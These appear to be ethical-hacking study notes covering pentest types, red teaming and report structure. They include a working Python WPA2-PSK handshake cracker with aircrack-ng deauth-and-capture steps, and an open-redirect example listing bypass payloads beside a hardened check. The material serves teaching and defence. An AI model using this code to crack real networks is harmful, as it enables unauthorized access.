Basic terminology of ethical hacking
What is offensive security?
Offensive security: using attacker techniques, with authorization, to find and demonstrate weaknesses so that an organization can make its security robust. In practice this mainly means various types of penetration testing plus writing a report; each is covered below.
Facets of penetration testing:
Network penetration:
this focuses on the network infrastructure of the target (hosts, network devices, services and protocols): finding network-level vulnerabilities, assessing their risk and verifying that network security controls work.
targets include modems, computers, routers and access points
Firewall misconfiguration and firewall bypass
IPS/IDS evasion
Router attacks
DNS-level attacks
Zone transfer attacks
Switching or routing-based attacks
SSH attacks
Proxy server attacks
Attacks on unnecessary open ports
Database attacks
Man-in-the-middle (MitM) attacks
FTP/SMTP-based attacks
Application pentesting:
assessing the applications the organization uses, including their plugins and logical structure: source code, databases and the application backend.
Types:
App penetration testing
Web penetration testing
3 Steps:
Reconnaissance: gathering information about the web servers, OS and other resources used by the application
Discovery: finding vulnerabilities and planning attack vectors against the application
Attack: exploiting a discovered vulnerability to demonstrate its impact
Wireless penetration:
assessing the security of the Wi-Fi networks on a premises for vulnerabilities is called a wireless pentest.
it covers the devices connected to the wireless networks, including IoT devices on the business Wi-Fi
steps:
- Reconnaissance / information gathering (war driving) for Wi-Fi networks; typical equipment:
A car or any other transportation vehicle.
A laptop and a Wi-Fi antenna.
Wireless network adapter.
Packet capture and analysis software.
Vulnerability research (most common: the WPA/WPA2 4-way handshake, whose messages are sent in the clear and allow an offline attack on the pre-shared key)
Attack/Exploitation → using the Aircrack-ng suite (aireplay-ng to de-authenticate, airodump-ng to capture, aircrack-ng to crack)
De-authenticating a legitimate client.
Capturing the 4-way handshake when the legitimate client reconnects.
Running an offline dictionary attack against the captured handshake to recover the pre-shared key (the Wi-Fi passphrase).
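To show why a captured handshake is enough for an offline attack, here is an added Python example, written for these notes and not taken from the Aircrack-ng project, that re-implements the WPA2-PSK computation aircrack-ng performs: PBKDF2 to the PMK, the 802.11i PRF to the PTK, and the MIC check over EAPOL-Key message 2. The SSID, MAC addresses, nonces, EAPOL frame bytes, passphrase and wordlist are all constructed inline for the demonstration; in a real test they come from the airodump-ng capture.

```python
import hashlib
import hmac

# Added example: WPA2-PSK derivation and MIC check, the computation behind an
# offline dictionary attack on a captured 4-way handshake. All inputs below are
# constructed for the demo, not taken from a real capture.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    This is the expensive step: it must be redone for every candidate
    passphrase, which is why wordlist quality matters more than raw speed.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: 64-byte PTK from the PMK, both MACs and both nonces.

    Everything except the PMK is sent in the clear during the handshake,
    which is exactly what the capture hands the attacker.
    """
    label = b"Pairwise key expansion"
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """EAPOL-Key MIC for key descriptor version 2 (WPA2/CCMP): HMAC-SHA1
    truncated to 16 bytes, over the frame with its MIC field set to zero.
    (Version 1/TKIP uses HMAC-MD5; version 3 uses AES-128-CMAC.)"""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, ap_mac, client_mac, anonce, snonce, eapol_zeroed, mic, wordlist):
    """Offline dictionary attack: derive PMK -> PTK -> KCK for each candidate
    and compare the recomputed MIC of message 2 with the captured one."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]  # KCK = PTK[0:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), mic):
            return candidate
    return None


# --- constructed sample handshake (stands in for the airodump-ng capture) ---
SAMPLE_SSID = "CorpWiFi"           # assumption: demo network name
SAMPLE_PASSPHRASE = "Summer2024!"  # assumption: the "unknown" PSK we recover
SAMPLE_WORDLIST = ["password", "12345678", "Summer2023!", "Summer2024!", "letmein123"]


def build_sample_handshake(passphrase=SAMPLE_PASSPHRASE, ssid=SAMPLE_SSID):
    """Simulate the client side: compute the MIC the client would place in
    message 2 of the handshake, so the attacker side has something to check."""
    ap_mac = bytes.fromhex("00c0ca123456")      # constructed BSSID
    client_mac = bytes.fromhex("dca632abcdef")  # constructed station MAC
    anonce = hashlib.sha256(b"demo-anonce").digest()  # fixed 32-byte nonces
    snonce = hashlib.sha256(b"demo-snonce").digest()
    # EAPOL-Key message 2 layout with the 16-byte MIC field zeroed:
    # header(4) descriptor(1) key-info(2) key-len(2) replay-ctr(8) nonce(32)
    # IV(16) RSC(8) ID(8) MIC(16) key-data-len(2); key data omitted.
    eapol_zeroed = (bytes.fromhex("0103005f02010a") + bytes(2) + bytes(8)
                    + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol_zeroed)
    return ap_mac, client_mac, anonce, snonce, eapol_zeroed, mic


def run_dictionary_attack(wordlist=SAMPLE_WORDLIST):
    """Attacker side: only the captured handshake fields, the MIC and a wordlist."""
    return crack_psk(SAMPLE_SSID, *build_sample_handshake(), wordlist)


if __name__ == "__main__":
    print("recovered PSK:", run_dictionary_attack())
```

Note that nothing in crack_psk talks to the access point: after the deauth-and-capture step the attack is purely offline, so a long, non-dictionary passphrase (or WPA3/SAE, which removes the offline-guessable handshake) is the defence, not rate limiting on the AP.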
Physical pentesting:
Tests whether an attacker can get physical access to server rooms and other sensitive facilities within a building and attack from inside; common entry techniques:
social engineering
tailgating
badge cloning
Social engineering:
The weakest link in the security chain is the people within an organization; they can be targeted through phishing, spoofing and USB drops (planted removable drives).
Client-Side attacks:
Attackers often compromise client-side software (browsers, office applications and their plugins) to gain a foothold in company infrastructure.
Perform client-side testing to identify attacks that target the user's browser or client software, such as:
Cross-site scripting attacks (XSS)
Clickjacking attacks
Cross-origin resource sharing (CORS) misconfiguration
Form hijacking
HTML injection
Open redirection
Malware infection
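As an added illustration for the open redirection entry above (example code written for these notes, not from any project), here is the vulnerable pattern beside a hardened Python check for a `next`-style redirect parameter. The hostname `example.com` and the inputs are constructed for the demo; the check goes beyond the single case named in the list and handles the common bypasses a tester would try.

```python
from urllib.parse import urlsplit

# Added example: open redirection, vulnerable pattern vs. hardened check.
# Hostnames and inputs are constructed for the demo.


def vulnerable_redirect(next_url: str) -> str:
    """Builds a Location header straight from user input: an open redirect.
    ?next=https://evil.example sends the user off-site from a trusted domain's
    URL, which is what phishing campaigns exploit."""
    return "Location: " + next_url


def is_safe_redirect(target: str, allowed_host: str) -> bool:
    """True only if target stays on allowed_host.

    Handles the usual bypasses: scheme-relative '//evil.example', backslash
    variants '/\\evil.example' (browsers treat '\\' as '/'), triple-slash
    '///evil.example', 'javascript:' and other schemes, userinfo tricks
    'https://example.com@evil.example', and CR/LF injected into the header.
    """
    if not target or any(c in target for c in "\r\n\t"):
        return False
    target = target.strip().replace("\\", "/")
    parts = urlsplit(target)
    if parts.netloc:
        # Absolute or scheme-relative URL: require http(s) and an exact host match.
        # .hostname drops userinfo and port, so 'user@evil.example:80' is seen
        # as 'evil.example' rather than being confused with the allowed host.
        return parts.scheme in ("http", "https") and parts.hostname == allowed_host.lower()
    if parts.scheme:
        return False  # 'javascript:', 'data:', 'https:relative' and friends
    # A plain path: must start with exactly one slash ('//' would be host-relative).
    return target.startswith("/") and not target.startswith("//")


def safe_redirect(next_url: str, allowed_host: str, fallback: str = "/") -> str:
    """Hardened version: validate the target and fall back to a fixed local path."""
    return "Location: " + (next_url if is_safe_redirect(next_url, allowed_host) else fallback)


if __name__ == "__main__":
    for candidate in ["/account", "//evil.example", "/\\evil.example",
                      "https://example.com@evil.example/", "javascript:alert(1)"]:
        print(repr(candidate), "->", safe_redirect(candidate, "example.com"))
```

An allow-list of local paths is simpler still where the application can afford it; the host comparison above is for sites that legitimately redirect to their own absolute URLs.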
Red Teaming:
Regular penetration tests are important, but they usually test components in isolation and don't provide realistic conditions such as chained attack techniques carried out over time. Red teaming allows security teams to assess the overall environment and understand how its components (and the defenders) function together. It requires critical thinking to identify new, complex attack paths rather than single vulnerabilities.
Report writing:
Content of the report:
Goal: what the engagement set out to achieve
Time: include timestamps of the various activities
Audience: write for a specific audience (executives vs. technical staff)
Classification: mark the document's classification, as it contains sensitive information.
Distribution: record the total number of copies generated and the identities of the people the report was sent to, as the information is confidential.
Method of writing the report:
make a draft containing all the information about the steps you took
proofread before presenting
Structure of report:
Executive Summary
Scope and Limitations of the Project
Objectives
Assumptions
Timeline
Summary of Results
Summary of Suggestions
Methodology
Plan Formulation
Execution of the Attack
Reporting
Findings
Detailed Information
References
Appendix
Some specializations
Once you have the basics of each type of penetration testing, you can opt for a specialization; some include:
OSCP: Offensive Security Certified Professional
these are part of one path
OSEP: Offensive Security Experienced Penetration Tester
OSWE: Offensive Security Web Expert
OSED: Offensive Security Exploit Developer